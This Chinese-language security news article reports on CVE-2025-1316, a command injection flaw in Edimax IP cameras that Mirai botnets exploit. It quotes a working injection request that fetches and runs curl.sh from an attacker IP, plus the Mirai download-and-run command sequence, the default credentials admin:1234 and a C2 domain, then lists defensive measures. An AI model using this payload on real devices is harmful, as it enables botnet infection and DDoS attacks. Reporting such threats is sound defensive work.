在现代社会，**物联网*设备的普及为我们的生活带来了便利，但与此同时，它们也成为网络犯罪分子攻击的重点目标。最近，Akamai安全情报和响应团队（SIRT）发布的警报指出，Edimax物联网设备中存在一个严重的命令注入漏洞，该漏洞被多个僵尸网络利用以传播Mirai恶意软件**。此漏洞被标记为CVE-2025-1316，且已被证实是一个持续存在的危险，影响了一系列Edimax设备，使用户面临严重的安全风险。

Mirai恶意软件以其能够妥协物联网设备并发动分布式拒绝服务（DDoS）攻击而臭名昭著。CVE-2025-1316漏洞具体针对Edimax设备中的 /camera-cgi/admin/param.cgi 端点，攻击者可以利用此漏洞在 ipcamSource 参数的 NTP_serverName 选项中注入命令。若要成功利用此漏洞，攻击者通常会使用如 admin:1234 这样的默认凭据。尽管该漏洞特别提到Edimax的IC-7100网络摄像头，但它可能影响更广泛范围的Edimax设备。

Akamai SIRT最早在2024年10月的蜜罐中检测到针对该漏洞的活动，而理论上的利用代码早在2023年6月就已经存在。最早的攻击尝试发生在2024年5月，随着时间的推移，在2024年9月以及2025年1月至2月期间，这种活动达到了高峰。这些攻击主要由不同的僵尸网络进行，包括Mirai的变种。

为了向大家展示危害，以下是利用该漏洞的一个示例攻击代码。这段代码注入命令以在设备上执行一个shell脚本：

/camera-cgi/admin/param.cgi action=update&ipcamSource=/ntp.asp?r=20130724&NTP_enable=1&NTP_serverName=;$(cd /tmp; wget http://193.143.1[.]118/curl.sh; chmod 777 curl.sh; sh curl.sh)&NTP_tzCityNo=16&NTP_tzMinute=0&NTP_daylightSaving=0

这一脚本下载并执行一个不同架构的Mirai恶意软件变体，包括ARM、MIPS和x86。这一过程涉及几个命令的执行，确保恶意软件的顺利下载安装。例如，命令行中可能会包含：

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;

wget http://193.143.1[.]118/x86;

curl -O http://193.143.1[.]118/x86;

cat x86 > OSGt;

chmod +x *;

./OSGt joined;

rm -rf OSGt

相似的命令适用于其他架构。此次攻击中发现有两个不同的僵尸网络在利用此漏洞。第一个僵尸网络利用漏洞下载并执行一个名为 curl.sh 的脚本，通过 angela.spklove[.]com 的命令控制（C2）服务器与外部进行通信，该恶意软件在执行时会打印出“VagneRHere”的信息。第二个僵尸网络则下载并运行一个名为 wget.sh 的脚本，其中执行的 Mirai恶意软件 具有反调试功能，并在执行时打印出“Hello, World!”。

这两个僵尸网络都利用了多个已知的漏洞，包括Docker API漏洞和影响TOTOLINK设备的CVE-2024-7214。随着Mirai恶意软件的遗产继续影响物联网安全，及时了解相关威胁并采取有效的应对措施显得尤为重要。

为了保护自己免受这些威胁，用户应采取以下措施：首先，升级受影响的设备，将过时或易受攻击的设备替换为新型号；其次，确保所有设备使用强大且独特的密码，以防止简单的暴力破解攻击；同时，监控网络流量，以检测可疑活动，例如异常的流量模式；最后，实施安全措施，使用防火墙和入侵检测系统来阻止利用漏洞的尝试。

Mirai恶意软件的持续演变以及Edimax物联网设备遭到不断利用的事实，突显了与遗留固件相关的风险以及对用户隐私和安全的重大威胁。 网络安全并不是一项可以轻视的任务，保护自身设备和用户数据需要持续的努力和警惕。时代在发展，网络安全的威胁形式也在不断变化，这就要求我们与时俱进，随时准备应对新兴的网络攻击，以保护我们的数字资产不被侵害。在这个快速发展的技术环境中，只有建立强大的安全基础，才能确保我们在拥抱科技的同时，也能抵御潜在的网络氛围中滋生的威胁。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课